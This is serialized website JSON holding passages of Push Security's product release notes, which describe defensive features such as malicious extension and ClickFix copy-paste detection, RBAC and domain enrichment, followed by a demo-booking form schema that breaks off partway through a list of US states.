event.",{"data":13227,"content":13228,"nodeType":1258},{},[13229,13232,13241],{"data":13230,"marks":13231,"value":31,"nodeType":1257},{},[],{"data":13233,"content":13237,"nodeType":13109},{"target":13234},{"sys":13235},{"id":13236,"type":1340,"linkType":1341},"7jygmadjoz0asAHv7e5PuK",[13238],{"data":13239,"marks":13240,"value":13108,"nodeType":1257},{},[],{"data":13242,"marks":13243,"value":31,"nodeType":1257},{},[],{"data":13245,"content":13246,"nodeType":1311},{},[13247],{"data":13248,"marks":13249,"value":13020,"nodeType":1257},{},[],{"data":13251,"content":13252,"nodeType":1258},{},[13253],{"data":13254,"marks":13255,"value":13256,"nodeType":1257},{},[],"Customize the look and feel of employee-facing banners and warn or block pages by adding your company logo, accent color, and choice of light or dark mode themes. 
",{"data":13258,"content":13259,"nodeType":1258},{},[13260,13264,13269],{"data":13261,"marks":13262,"value":13263,"nodeType":1257},{},[],"To add your brand elements, go to ",{"data":13265,"marks":13266,"value":13268,"nodeType":1257},{},[13267],{"type":1318},"Settings > Branding",{"data":13270,"marks":13271,"value":2249,"nodeType":1257},{},[],{"data":13273,"content":13277,"nodeType":1335},{"target":13274},{"sys":13275},{"id":13276,"type":1340,"linkType":1341},"3Jawd7IBSA3GF2XBHARsn",[],{"data":13279,"content":13280,"nodeType":1258},{},[13281,13284,13293],{"data":13282,"marks":13283,"value":31,"nodeType":1257},{},[],{"data":13285,"content":13289,"nodeType":13109},{"target":13286},{"sys":13287},{"id":13288,"type":1340,"linkType":1341},"4i1KWgBfYqtFYlUFRYiGdW",[13290],{"data":13291,"marks":13292,"value":13108,"nodeType":1257},{},[],{"data":13294,"marks":13295,"value":31,"nodeType":1257},{},[],{"data":13297,"content":13298,"nodeType":1311},{},[13299],{"data":13300,"marks":13301,"value":13030,"nodeType":1257},{},[],{"data":13303,"content":13304,"nodeType":1258},{},[13305],{"data":13306,"marks":13307,"value":13308,"nodeType":1257},{},[],"The Push browser extension can now collect additional metadata and store it locally for up to 30 days, powering more diverse and precise detections, including for emerging threats. ",{"data":13310,"content":13311,"nodeType":1258},{},[13312,13316,13320,13324,13329],{"data":13313,"marks":13314,"value":13315,"nodeType":1257},{},[],"Detections informed by this metadata will be raised on the ",{"data":13317,"marks":13318,"value":13066,"nodeType":1257},{},[13319],{"type":1318},{"data":13321,"marks":13322,"value":13323,"nodeType":1257},{},[]," page. 
Note that these detections do not block end-user activity and are ",{"data":13325,"marks":13326,"value":13328,"nodeType":1257},{},[13327],{"type":1318},"Monitor",{"data":13330,"marks":13331,"value":13332,"nodeType":1257},{},[]," mode only.",{"data":13334,"content":13335,"nodeType":1258},{},[13336,13340,13345,13349,13354],{"data":13337,"marks":13338,"value":13339,"nodeType":1257},{},[],"We recommend you enable ",{"data":13341,"marks":13342,"value":13344,"nodeType":1257},{},[13343],{"type":1318},"Browser event storage",{"data":13346,"marks":13347,"value":13348,"nodeType":1257},{},[]," to take advantage of this capability. Go to ",{"data":13350,"marks":13351,"value":13353,"nodeType":1257},{},[13352],{"type":1318},"Settings > Telemetry > Browser event storage",{"data":13355,"marks":13356,"value":13357,"nodeType":1257},{},[]," in the admin console.",{"data":13359,"content":13360,"nodeType":1258},{},[13361,13364,13373],{"data":13362,"marks":13363,"value":31,"nodeType":1257},{},[],{"data":13365,"content":13369,"nodeType":13109},{"target":13366},{"sys":13367},{"id":13368,"type":1340,"linkType":1341},"1x69JxXcDWEDIzYXUM8nGb",[13370],{"data":13371,"marks":13372,"value":13108,"nodeType":1257},{},[],{"data":13374,"marks":13375,"value":31,"nodeType":1257},{},[],{"data":13377,"content":13378,"nodeType":1311},{},[13379],{"data":13380,"marks":13381,"value":13382,"nodeType":1257},{},[],"And a few other things ...",{"data":13384,"content":13385,"nodeType":1258},{},[13386],{"data":13387,"marks":13388,"value":13389,"nodeType":1257},{},[],"Other new features or improvements to the platform include:",{"data":13391,"content":13392,"nodeType":1884},{},[13393,13413,13423,13443],{"data":13394,"content":13395,"nodeType":1888},{},[13396],{"data":13397,"content":13398,"nodeType":1258},{},[13399,13403,13410],{"data":13400,"marks":13401,"value":13402,"nodeType":1257},{},[],"You can now configure the frequency with which app banners will be displayed: either per-tab or per-browser. 
",{"data":13404,"content":13406,"nodeType":1364},{"uri":13405},"/help/10125#frequency",[13407],{"data":13408,"marks":13409,"value":13108,"nodeType":1257},{},[],{"data":13411,"marks":13412,"value":31,"nodeType":1257},{},[],{"data":13414,"content":13415,"nodeType":1888},{},[13416],{"data":13417,"content":13418,"nodeType":1258},{},[13419],{"data":13420,"marks":13421,"value":13422,"nodeType":1257},{},[],"You can now define an Owner role as part of Push’s RBAC options. Only Owners can edit roles, delete your team (e.g. tenant), change default SAML roles, or update your team name.",{"data":13424,"content":13425,"nodeType":1888},{},[13426],{"data":13427,"content":13428,"nodeType":1258},{},[13429,13433,13440],{"data":13430,"marks":13431,"value":13432,"nodeType":1257},{},[],"Webhook events now include detection details, for greater context. ",{"data":13434,"content":13436,"nodeType":1364},{"uri":13435},"https://pushsecurity.com/help/audience/engineering/webhooks-v1/detections",[13437],{"data":13438,"marks":13439,"value":13108,"nodeType":1257},{},[],{"data":13441,"marks":13442,"value":31,"nodeType":1257},{},[],{"data":13444,"content":13445,"nodeType":1888},{},[13446],{"data":13447,"content":13448,"nodeType":1258},{},[13449,13453,13460],{"data":13450,"marks":13451,"value":13452,"nodeType":1257},{},[],"Push now uses static IP addresses to emit webhook events. These IP addresses are in the same range we previously used, but if you wish to update your network filtering to these new, narrower IP addresses, you can. 
",{"data":13454,"content":13456,"nodeType":1364},{"uri":13455},"https://pushsecurity.com/help/audience/engineering/webhooks-v1/section/ip-addresses",[13457],{"data":13458,"marks":13459,"value":13108,"nodeType":1257},{},[],{"data":13461,"marks":13462,"value":31,"nodeType":1257},{},[],{"data":13464,"content":13465,"nodeType":1258},{},[13466],{"data":13467,"marks":13468,"value":31,"nodeType":1257},{},[],{"entries":13470},{"inline":13471,"hyperlink":13472,"block":13503},[],[13473,13479,13484,13488,13493,13498],{"sys":13474,"__typename":13475,"title":13476,"slug":13477,"articleId":13478},{"id":13103},"HelpArticle","How does Push detect malicious browser extensions?","how-does-push-detect-malicious-browser-extensions",10148,{"sys":13480,"__typename":13475,"title":13481,"slug":13482,"articleId":13483},{"id":13158},"Can Push detect and disable other installed browser extensions?","can-push-detect-other-installed-browser-extensions",10138,{"sys":13485,"__typename":1278,"title":13486,"slug":13487},{"id":13183},"Introducing malicious copy and paste detection","introducing-malicious-copy-paste-detection",{"sys":13489,"__typename":13475,"title":13490,"slug":13491,"articleId":13492},{"id":13236},"How does Push detect attacks like ClickFix and FileFix?","how-does-push-detect-attacks-like-clickfix-and-filefix",10141,{"sys":13494,"__typename":13475,"title":13495,"slug":13496,"articleId":13497},{"id":13288},"How do I add custom branding to Push banners and block pages?","how-do-i-add-custom-branding-to-push-banners-and-block-pages",10147,{"sys":13499,"__typename":13475,"title":13500,"slug":13501,"articleId":13502},{"id":13368},"How do I configure browser event storage?","how-do-i-configure-browser-event-storage",10146,[13504,13511,13518],{"sys":13505,"__typename":6404,"title":13506,"caption":118,"layoutMode":118,"file":13507},{"id":13091},"Malicious extension detection - Controls page - for release 
notes",{"url":13508,"width":13509,"height":13510},"https://images.ctfassets.net/y1cdw1ablpvd/2OhoXumfBK0saT2oLeCPrI/95950149e4c7f11c53948ba0cf0b09b5/malicious_ext_det_controls_pg.png",1337,767,{"sys":13512,"__typename":6404,"title":13513,"caption":118,"layoutMode":118,"file":13514},{"id":13146},"Browser extension block screen - KB 10138",{"url":13515,"width":13516,"height":13517},"https://images.ctfassets.net/y1cdw1ablpvd/3i6Sj2jgOimCqGtpKy1B7p/3c78161975dbc1cab3d5d2c454206111/extension_block_page_dark_theme.png",1270,717,{"sys":13519,"__typename":6404,"title":13520,"caption":13521,"layoutMode":118,"file":13522},{"id":13276},"Branded banner example - dark style - KB 10147","Example of a dark style mid-screen banner",{"url":13523,"width":13524,"height":13525},"https://images.ctfassets.net/y1cdw1ablpvd/F8v8jKH2SXlMeHbG83Nvh/2b7c51c8bbb2ad74947f4a2bcee3048b/midscreen_dark_banner.png",2944,562,{"items":13527},[13528],{"__typename":1278,"sys":13529,"content":13531,"title":14235,"synopsis":14236,"hashTags":118,"publishedDate":14237,"slug":14238,"tagsCollection":14239,"authorsCollection":14243},{"id":13530},"3ygDMHnTN58Lyb3W3k969w",{"json":13532},{"data":13533,"content":13534,"nodeType":1259},{},[13535,13541,13613,13619,13626,13651,13676,13709,13715,13732,13738,13745,13752,13784,13790,13807,13813,13829,13836,13859,13866,13873,13896,13912,13918,13924,13931,13947,13954,14007,14014,14020,14038,14044,14060,14067,14090,14113,14119,14125,14229],{"data":13536,"content":13537,"nodeType":1311},{},[13538],{"data":13539,"marks":13540,"value":12977,"nodeType":1257},{},[],{"data":13542,"content":13543,"nodeType":1884},{},[13544,13554,13564,13574,13584,13594,13604],{"data":13545,"content":13546,"nodeType":1888},{},[13547],{"data":13548,"content":13549,"nodeType":1258},{},[13550],{"data":13551,"marks":13552,"value":13553,"nodeType":1257},{},[],"Get visibility for all installed browser extensions in your 
environment",{"data":13555,"content":13556,"nodeType":1888},{},[13557],{"data":13558,"content":13559,"nodeType":1258},{},[13560],{"data":13561,"marks":13562,"value":13563,"nodeType":1257},{},[],"New detection for ClickFix-style malicious copy-paste attacks",{"data":13565,"content":13566,"nodeType":1888},{},[13567],{"data":13568,"content":13569,"nodeType":1258},{},[13570],{"data":13571,"marks":13572,"value":13573,"nodeType":1257},{},[],"New Labs feature: Experimental detections",{"data":13575,"content":13576,"nodeType":1888},{},[13577],{"data":13578,"content":13579,"nodeType":1258},{},[13580],{"data":13581,"marks":13582,"value":13583,"nodeType":1257},{},[],"RBAC for the Push admin console",{"data":13585,"content":13586,"nodeType":1888},{},[13587],{"data":13588,"content":13589,"nodeType":1258},{},[13590],{"data":13591,"marks":13592,"value":13593,"nodeType":1257},{},[],"URLscan.io and domain registration enrichment for detections",{"data":13595,"content":13596,"nodeType":1888},{},[13597],{"data":13598,"content":13599,"nodeType":1258},{},[13600],{"data":13601,"marks":13602,"value":13603,"nodeType":1257},{},[],"Filter events by entities",{"data":13605,"content":13606,"nodeType":1888},{},[13607],{"data":13608,"content":13609,"nodeType":1258},{},[13610],{"data":13611,"marks":13612,"value":13040,"nodeType":1257},{},[],{"data":13614,"content":13615,"nodeType":1311},{},[13616],{"data":13617,"marks":13618,"value":13553,"nodeType":1257},{},[],{"data":13620,"content":13621,"nodeType":1258},{},[13622],{"data":13623,"marks":13624,"value":13625,"nodeType":1257},{},[],"You can now use Push to see other browser extensions installed on your employees’ browsers.",{"data":13627,"content":13628,"nodeType":1258},{},[13629,13633,13638,13642,13647],{"data":13630,"marks":13631,"value":13632,"nodeType":1257},{},[],"You can enable this feature by going to ",{"data":13634,"marks":13635,"value":13637,"nodeType":1257},{},[13636],{"type":1318},"Settings > 
Organization",{"data":13639,"marks":13640,"value":13641,"nodeType":1257},{},[]," in the Push admin console and toggling on ",{"data":13643,"marks":13644,"value":13646,"nodeType":1257},{},[13645],{"type":1318},"Browser extension visibility",{"data":13648,"marks":13649,"value":13650,"nodeType":1257},{},[],". There is no end-user impact when you enable this feature.",{"data":13652,"content":13653,"nodeType":1258},{},[13654,13658,13663,13667,13672],{"data":13655,"marks":13656,"value":13657,"nodeType":1257},{},[],"You’ll see browser extension data populate a new ",{"data":13659,"marks":13660,"value":13662,"nodeType":1257},{},[13661],{"type":1318},"Browser extensions",{"data":13664,"marks":13665,"value":13666,"nodeType":1257},{},[]," page in the admin console under ",{"data":13668,"marks":13669,"value":13671,"nodeType":1257},{},[13670],{"type":1318},"Investigate",{"data":13673,"marks":13674,"value":13675,"nodeType":1257},{},[],". With this information, you can see:",{"data":13677,"content":13678,"nodeType":1884},{},[13679,13689,13699],{"data":13680,"content":13681,"nodeType":1888},{},[13682],{"data":13683,"content":13684,"nodeType":1258},{},[13685],{"data":13686,"marks":13687,"value":13688,"nodeType":1257},{},[],"Which extensions have been installed for each employee and browser.",{"data":13690,"content":13691,"nodeType":1888},{},[13692],{"data":13693,"content":13694,"nodeType":1258},{},[13695],{"data":13696,"marks":13697,"value":13698,"nodeType":1257},{},[],"How they were installed (e.g. 
by policy, manually, or sideloaded).",{"data":13700,"content":13701,"nodeType":1888},{},[13702],{"data":13703,"content":13704,"nodeType":1258},{},[13705],{"data":13706,"marks":13707,"value":13708,"nodeType":1257},{},[],"Which permissions they have.",{"data":13710,"content":13714,"nodeType":1335},{"target":13711},{"sys":13712},{"id":13713,"type":1340,"linkType":1341},"5J5jdmwugy7yU8GGwxe7iH",[],{"data":13716,"content":13717,"nodeType":1258},{},[13718,13721,13729],{"data":13719,"marks":13720,"value":31,"nodeType":1257},{},[],{"data":13722,"content":13725,"nodeType":13109},{"target":13723},{"sys":13724},{"id":13158,"type":1340,"linkType":1341},[13726],{"data":13727,"marks":13728,"value":13108,"nodeType":1257},{},[],{"data":13730,"marks":13731,"value":31,"nodeType":1257},{},[],{"data":13733,"content":13734,"nodeType":1311},{},[13735],{"data":13736,"marks":13737,"value":13563,"nodeType":1257},{},[],{"data":13739,"content":13740,"nodeType":1258},{},[13741],{"data":13742,"marks":13743,"value":13744,"nodeType":1257},{},[],"Push can now detect malicious copy and paste attacks like ClickFix, FileFix, and other fake CAPTCHA-style techniques.",{"data":13746,"content":13747,"nodeType":1258},{},[13748],{"data":13749,"marks":13750,"value":13751,"nodeType":1257},{},[],"These techniques have become one of the most prevalent attack types this year, and rely on deceiving users into manually or automatically copying malicious code and running it locally.",{"data":13753,"content":13754,"nodeType":1258},{},[13755,13759,13764,13768,13772,13776,13780],{"data":13756,"marks":13757,"value":13758,"nodeType":1257},{},[],"You can enable ",{"data":13760,"marks":13761,"value":13763,"nodeType":1257},{},[13762],{"type":1318},"Malicious copy and paste detection",{"data":13765,"marks":13766,"value":13767,"nodeType":1257},{},[]," from the ",{"data":13769,"marks":13770,"value":13082,"nodeType":1257},{},[13771],{"type":1318},{"data":13773,"marks":13774,"value":13775,"nodeType":1257},{},[]," page of the 
Push admin console. Add a configuration rule to set the detection to ",{"data":13777,"marks":13778,"value":13328,"nodeType":1257},{},[13779],{"type":1318},{"data":13781,"marks":13782,"value":13783,"nodeType":1257},{},[],". You can also add an exception for any staff who routinely handle malicious scripts, such as security team members, or add domains to the ignore list as needed.",{"data":13785,"content":13789,"nodeType":1335},{"target":13786},{"sys":13787},{"id":13788,"type":1340,"linkType":1341},"2fPaiwRCAUd8lMvsVO03HZ",[],{"data":13791,"content":13792,"nodeType":1258},{},[13793,13796,13804],{"data":13794,"marks":13795,"value":31,"nodeType":1257},{},[],{"data":13797,"content":13800,"nodeType":13109},{"target":13798},{"sys":13799},{"id":13183,"type":1340,"linkType":1341},[13801],{"data":13802,"marks":13803,"value":13108,"nodeType":1257},{},[],{"data":13805,"marks":13806,"value":31,"nodeType":1257},{},[],{"data":13808,"content":13809,"nodeType":1311},{},[13810],{"data":13811,"marks":13812,"value":13573,"nodeType":1257},{},[],{"data":13814,"content":13815,"nodeType":1258},{},[13816,13820,13825],{"data":13817,"marks":13818,"value":13819,"nodeType":1257},{},[],"Get early access to new detections from the Push research team by enabling ",{"data":13821,"marks":13822,"value":13824,"nodeType":1257},{},[13823],{"type":1318},"Experimental detections",{"data":13826,"marks":13827,"value":13828,"nodeType":1257},{},[],", a Labs feature.",{"data":13830,"content":13831,"nodeType":1258},{},[13832],{"data":13833,"marks":13834,"value":13835,"nodeType":1257},{},[],"Labs features are new features Push is testing before releasing them. Early access detections are designed to catch emerging attacker techniques, but may also produce more false positives while we fine-tune them. 
These early access detections do not block any user actions.",{"data":13837,"content":13838,"nodeType":1258},{},[13839,13843,13847,13851,13856],{"data":13840,"marks":13841,"value":13842,"nodeType":1257},{},[],"Enable ",{"data":13844,"marks":13845,"value":13824,"nodeType":1257},{},[13846],{"type":1318},{"data":13848,"marks":13849,"value":13850,"nodeType":1257},{},[]," by going to ",{"data":13852,"marks":13853,"value":13855,"nodeType":1257},{},[13854],{"type":1318},"Settings > Labs",{"data":13857,"marks":13858,"value":13357,"nodeType":1257},{},[],{"data":13860,"content":13861,"nodeType":1311},{},[13862],{"data":13863,"marks":13864,"value":13865,"nodeType":1257},{},[],"RBAC for the Push platform",{"data":13867,"content":13868,"nodeType":1258},{},[13869],{"data":13870,"marks":13871,"value":13872,"nodeType":1257},{},[],"You can now provide read-only access to the Push admin console to facilitate investigations, review detections, check app usage by department, help with employee offboarding — or anything else you need.",{"data":13874,"content":13875,"nodeType":1258},{},[13876,13880,13884,13888,13893],{"data":13877,"marks":13878,"value":13879,"nodeType":1257},{},[],"To add a read-only admin, go to ",{"data":13881,"marks":13882,"value":13637,"nodeType":1257},{},[13883],{"type":1318},{"data":13885,"marks":13886,"value":13887,"nodeType":1257},{},[]," in the admin console. Enter the email address of the admin you want to invite and set the role to ",{"data":13889,"marks":13890,"value":13892,"nodeType":1257},{},[13891],{"type":1318},"Read only",{"data":13894,"marks":13895,"value":2249,"nodeType":1257},{},[],{"data":13897,"content":13898,"nodeType":1258},{},[13899,13903,13908],{"data":13900,"marks":13901,"value":13902,"nodeType":1257},{},[],"Note that existing Push admins now have the role of ",{"data":13904,"marks":13905,"value":13907,"nodeType":1257},{},[13906],{"type":1318},"Full access",{"data":13909,"marks":13910,"value":13911,"nodeType":1257},{},[],". 
You can adjust that role as needed from the Organization page, too.",{"data":13913,"content":13917,"nodeType":1335},{"target":13914},{"sys":13915},{"id":13916,"type":1340,"linkType":1341},"7kraCfSP2YwdEEwZ8FxM1t",[],{"data":13919,"content":13920,"nodeType":1311},{},[13921],{"data":13922,"marks":13923,"value":13593,"nodeType":1257},{},[],{"data":13925,"content":13926,"nodeType":1258},{},[13927],{"data":13928,"marks":13929,"value":13930,"nodeType":1257},{},[],"You can now enrich detections in Push with information from urlscan.io, and see when the domain was first registered. This information gives you domain-relevant context to support investigations.",{"data":13932,"content":13933,"nodeType":1258},{},[13934,13938,13943],{"data":13935,"marks":13936,"value":13937,"nodeType":1257},{},[],"To enable this feature, go to ",{"data":13939,"marks":13940,"value":13942,"nodeType":1257},{},[13941],{"type":1318},"Settings > Advanced > Domain enrichment",{"data":13944,"marks":13945,"value":13946,"nodeType":1257},{},[]," in the Push admin console or enable it from any existing detection event.",{"data":13948,"content":13949,"nodeType":1258},{},[13950],{"data":13951,"marks":13952,"value":13953,"nodeType":1257},{},[],"With this enrichment, you can quickly see:",{"data":13955,"content":13956,"nodeType":1884},{},[13957,13967,13977,13987,13997],{"data":13958,"content":13959,"nodeType":1888},{},[13960],{"data":13961,"content":13962,"nodeType":1258},{},[13963],{"data":13964,"marks":13965,"value":13966,"nodeType":1257},{},[],"The timestamp for when a domain was first registered",{"data":13968,"content":13969,"nodeType":1888},{},[13970],{"data":13971,"content":13972,"nodeType":1258},{},[13973],{"data":13974,"marks":13975,"value":13976,"nodeType":1257},{},[],"The number of times a domain was scanned on 
urlscan",{"data":13978,"content":13979,"nodeType":1888},{},[13980],{"data":13981,"content":13982,"nodeType":1258},{},[13983],{"data":13984,"marks":13985,"value":13986,"nodeType":1257},{},[],"The first time a domain was scanned",{"data":13988,"content":13989,"nodeType":1888},{},[13990],{"data":13991,"content":13992,"nodeType":1258},{},[13993],{"data":13994,"marks":13995,"value":13996,"nodeType":1257},{},[],"The last time a domain or IP was scanned",{"data":13998,"content":13999,"nodeType":1888},{},[14000],{"data":14001,"content":14002,"nodeType":1258},{},[14003],{"data":14004,"marks":14005,"value":14006,"nodeType":1257},{},[],"A urlscan verdict (e.g. “potentially malicious”)",{"data":14008,"content":14009,"nodeType":1258},{},[14010],{"data":14011,"marks":14012,"value":14013,"nodeType":1257},{},[],"You’ll see the enrichment data on the details slideout for an individual detection.",{"data":14015,"content":14019,"nodeType":1335},{"target":14016},{"sys":14017},{"id":14018,"type":1340,"linkType":1341},"563fJFSgoLDOwSXSQ9Y0MM",[],{"data":14021,"content":14022,"nodeType":1258},{},[14023,14026,14035],{"data":14024,"marks":14025,"value":31,"nodeType":1257},{},[],{"data":14027,"content":14031,"nodeType":13109},{"target":14028},{"sys":14029},{"id":14030,"type":1340,"linkType":1341},"19qsIXEG6EN9EK0VRH3pw9",[14032],{"data":14033,"marks":14034,"value":13108,"nodeType":1257},{},[],{"data":14036,"marks":14037,"value":31,"nodeType":1257},{},[],{"data":14039,"content":14040,"nodeType":1311},{},[14041],{"data":14042,"marks":14043,"value":13603,"nodeType":1257},{},[],{"data":14045,"content":14046,"nodeType":1258},{},[14047,14051,14056],{"data":14048,"marks":14049,"value":14050,"nodeType":1257},{},[],"You can now filter the ",{"data":14052,"marks":14053,"value":14055,"nodeType":1257},{},[14054],{"type":1318},"Events",{"data":14057,"marks":14058,"value":14059,"nodeType":1257},{},[]," page in the Push admin console by entities such as employees and apps to make triage more 
efficient.",{"data":14061,"content":14062,"nodeType":1258},{},[14063],{"data":14064,"marks":14065,"value":14066,"nodeType":1257},{},[],"With this option, you can do quick searches such as:",{"data":14068,"content":14069,"nodeType":1884},{},[14070,14080],{"data":14071,"content":14072,"nodeType":1888},{},[14073],{"data":14074,"content":14075,"nodeType":1258},{},[14076],{"data":14077,"marks":14078,"value":14079,"nodeType":1257},{},[],"See all recent events associated with an employee",{"data":14081,"content":14082,"nodeType":1888},{},[14083],{"data":14084,"content":14085,"nodeType":1258},{},[14086],{"data":14087,"marks":14088,"value":14089,"nodeType":1257},{},[],"See all recent logins for a given app",{"data":14091,"content":14092,"nodeType":1258},{},[14093,14097,14101,14105,14110],{"data":14094,"marks":14095,"value":14096,"nodeType":1257},{},[],"From the ",{"data":14098,"marks":14099,"value":14055,"nodeType":1257},{},[14100],{"type":1318},{"data":14102,"marks":14103,"value":14104,"nodeType":1257},{},[]," page, go to ",{"data":14106,"marks":14107,"value":14109,"nodeType":1257},{},[14108],{"type":1318},"Filters > Entity type",{"data":14111,"marks":14112,"value":2249,"nodeType":1257},{},[],{"data":14114,"content":14115,"nodeType":1311},{},[14116],{"data":14117,"marks":14118,"value":13040,"nodeType":1257},{},[],{"data":14120,"content":14121,"nodeType":1258},{},[14122],{"data":14123,"marks":14124,"value":13389,"nodeType":1257},{},[],{"data":14126,"content":14127,"nodeType":1884},{},[14128,14165,14187,14197,14219],{"data":14129,"content":14130,"nodeType":1888},{},[14131],{"data":14132,"content":14133,"nodeType":1258},{},[14134,14138,14148,14151,14161],{"data":14135,"marks":14136,"value":14137,"nodeType":1257},{},[],"You can now configure exceptions for ",{"data":14139,"content":14143,"nodeType":13109},{"target":14140},{"sys":14141},{"id":14142,"type":1340,"linkType":1341},"4oOTN6FXPpZg9MLgQUujys",[14144],{"data":14145,"marks":14146,"value":14147,"nodeType":1257},{},[],"MFA 
findings",{"data":14149,"marks":14150,"value":1703,"nodeType":1257},{},[],{"data":14152,"content":14156,"nodeType":13109},{"target":14153},{"sys":14154},{"id":14155,"type":1340,"linkType":1341},"2eOzRGosD2Ghaipao7NY8W",[14157],{"data":14158,"marks":14159,"value":14160,"nodeType":1257},{},[],"reused password",{"data":14162,"marks":14163,"value":14164,"nodeType":1257},{},[]," findings. This is useful if you purposefully reuse passwords between systems or enforce MFA through a third-party provider.",{"data":14166,"content":14167,"nodeType":1888},{},[14168],{"data":14169,"content":14170,"nodeType":1258},{},[14171,14175,14184],{"data":14172,"marks":14173,"value":14174,"nodeType":1257},{},[],"We’ve added several first-class SIEM integrations. ",{"data":14176,"content":14180,"nodeType":13109},{"target":14177},{"sys":14178},{"id":14179,"type":1340,"linkType":1341},"2M73i6A90S9MY6Pe8uVjVv",[14181],{"data":14182,"marks":14183,"value":13108,"nodeType":1257},{},[],{"data":14185,"marks":14186,"value":2249,"nodeType":1257},{},[],{"data":14188,"content":14189,"nodeType":1888},{},[14190],{"data":14191,"content":14192,"nodeType":1258},{},[14193],{"data":14194,"marks":14195,"value":14196,"nodeType":1257},{},[],"We’ve expanded the limit for URLs you can block using the URL blocking control to 2,000.",{"data":14198,"content":14199,"nodeType":1888},{},[14200],{"data":14201,"content":14202,"nodeType":1258},{},[14203,14207,14216],{"data":14204,"marks":14205,"value":14206,"nodeType":1257},{},[],"You can now set a time period after which to automatically un-license inactive employees, to make license management easier. 
",{"data":14208,"content":14212,"nodeType":13109},{"target":14209},{"sys":14210},{"id":14211,"type":1340,"linkType":1341},"6Ad43w7Cjz2L5fZN2klIOn",[14213],{"data":14214,"marks":14215,"value":13108,"nodeType":1257},{},[],{"data":14217,"marks":14218,"value":2249,"nodeType":1257},{},[],{"data":14220,"content":14221,"nodeType":1888},{},[14222],{"data":14223,"content":14224,"nodeType":1258},{},[14225],{"data":14226,"marks":14227,"value":14228,"nodeType":1257},{},[],"Push now supports Prisma Access browser.\n",{"data":14230,"content":14231,"nodeType":1258},{},[14232],{"data":14233,"marks":14234,"value":31,"nodeType":1257},{},[],"Product release: November 2025","Here’s what’s new on the Push platform for November 2025.","2025-11-04T00:00:00.000Z","product-release-november-2025",{"items":14240},[14241],{"sys":14242,"name":12958},{"id":12957},{"items":14244},[14245],{"fullName":12962,"firstName":12963,"jobTitle":12964,"profilePicture":14246},{"url":12966},"content:blog:product-release-march-2026.json","blog/product-release-march-2026.json","blog/product-release-march-2026",{"id":1205,"name":14251,"createdAt":14252,"updatedAt":14253,"archived":6,"fieldGroups":14254,"configuration":15184,"displayOptions":15190,"legalConsentOptions":15206,"formType":15207},"[Event - SecTor 2026] Book a demo","2026-04-06T20:45:53.411Z","2026-04-06T20:53:30.560Z",[14255,14264,14273,14278],{"groupType":14256,"richTextType":1257,"fields":14257},"default_group",[14258],{"objectTypeId":14259,"name":14260,"required":246,"hidden":6,"placeholder":14261,"validation":14262,"fieldType":14260},"0-1","email","Company email",{"blockedEmailDomains":14263,"useDefaultBlockList":246},[31],{"groupType":14256,"richTextType":1257,"fields":14265},[14266,14270],{"objectTypeId":14259,"name":14267,"required":246,"hidden":6,"placeholder":14268,"fieldType":14269},"firstname","First name","single_line_text",{"objectTypeId":14259,"name":14271,"required":246,"hidden":6,"placeholder":14272,"fieldType":14269},"lastname","Last 
name",{"groupType":14256,"richTextType":1257,"fields":14274},[14275],{"objectTypeId":14259,"name":14276,"required":246,"hidden":6,"placeholder":14277,"fieldType":14269},"company","Organization",{"groupType":14256,"richTextType":1257,"fields":14279},[14280],{"objectTypeId":14259,"name":14281,"required":246,"hidden":6,"dependentFields":14282,"options":14475,"placeholder":15183,"fieldType":14440},"company_country",[14283,14441],{"dependentCondition":14284,"dependentField":14288},{"operator":14285,"values":14286},"set_any",[14287],"United States",{"objectTypeId":14259,"name":14289,"required":246,"hidden":6,"options":14290,"placeholder":14439,"fieldType":14440},"company_state",[14291,14294,14296,14298,14301,14304,14307,14310,14313,14316,14319,14322,14325,14328,14331,14334,14337,14340,14343,14346,14349,14352,14355,14358,14361,14364,14367,14370,14373,14376,14379,14382,14385,14388,14391,14394,14397,14400,14403,14406,14409,14412,14415,14418,14421,14424,14427,14430,14433,14436],{"label":14292,"value":14292,"description":31,"displayOrder":14293},"Alabama",0,{"label":14295,"value":14295,"description":31,"displayOrder":42},"Alaska",{"label":14297,"value":14297,"description":31,"displayOrder":107},"Arizona",{"label":14299,"value":14299,"description":31,"displayOrder":14300},"Arkansas",3,{"label":14302,"value":14302,"description":31,"displayOrder":14303},"California",4,{"label":14305,"value":14305,"description":31,"displayOrder":14306},"Colorado",5,{"label":14308,"value":14308,"description":31,"displayOrder":14309},"Connecticut",6,{"label":14311,"value":14311,"description":31,"displayOrder":14312},"Delaware",7,{"label":14314,"value":14314,"description":31,"displayOrder":14315},"Florida",8,{"label":14317,"value":14317,"description":31,"displayOrder":14318},"Georgia",9,{"label":14320,"value":14320,"description":31,"displayOrder":14321},"Hawaii",10,{"label":14323,"value":14323,"description":31,"displayOrder":14324},"Idaho",11,{"label":14326,"value":14326,"description":31,"displayOrde
r":14327},"Illinois",12,{"label":14329,"value":14329,"description":31,"displayOrder":14330},"Indiana",13,{"label":14332,"value":14332,"description":31,"displayOrder":14333},"Iowa",14,{"label":14335,"value":14335,"description":31,"displayOrder":14336},"Kansas",15,{"label":14338,"value":14338,"description":31,"displayOrder":14339},"Kentucky",16,{"label":14341,"value":14341,"description":31,"displayOrder":14342},"Louisiana",17,{"label":14344,"value":14344,"description":31,"displayOrder":14345},"Maine",18,{"label":14347,"value":14347,"description":31,"displayOrder":14348},"Maryland",19,{"label":14350,"value":14350,"description":31,"displayOrder":14351},"Massachusetts",20,{"label":14353,"value":14353,"description":31,"displayOrder":14354},"Michigan",21,{"label":14356,"value":14356,"description":31,"displayOrder":14357},"Minnesota",22,{"label":14359,"value":14359,"description":31,"displayOrder":14360},"Mississippi",23,{"label":14362,"value":14362,"description":31,"displayOrder":14363},"Missouri",24,{"label":14365,"value":14365,"description":31,"displayOrder":14366},"Montana",25,{"label":14368,"value":14368,"description":31,"displayOrder":14369},"Nebraska",26,{"label":14371,"value":14371,"description":31,"displayOrder":14372},"Nevada",27,{"label":14374,"value":14374,"description":31,"displayOrder":14375},"New Hampshire",28,{"label":14377,"value":14377,"description":31,"displayOrder":14378},"New Jersey",29,{"label":14380,"value":14380,"description":31,"displayOrder":14381},"New Mexico",30,{"label":14383,"value":14383,"description":31,"displayOrder":14384},"New York",31,{"label":14386,"value":14386,"description":31,"displayOrder":14387},"North Carolina",32,{"label":14389,"value":14389,"description":31,"displayOrder":14390},"North 
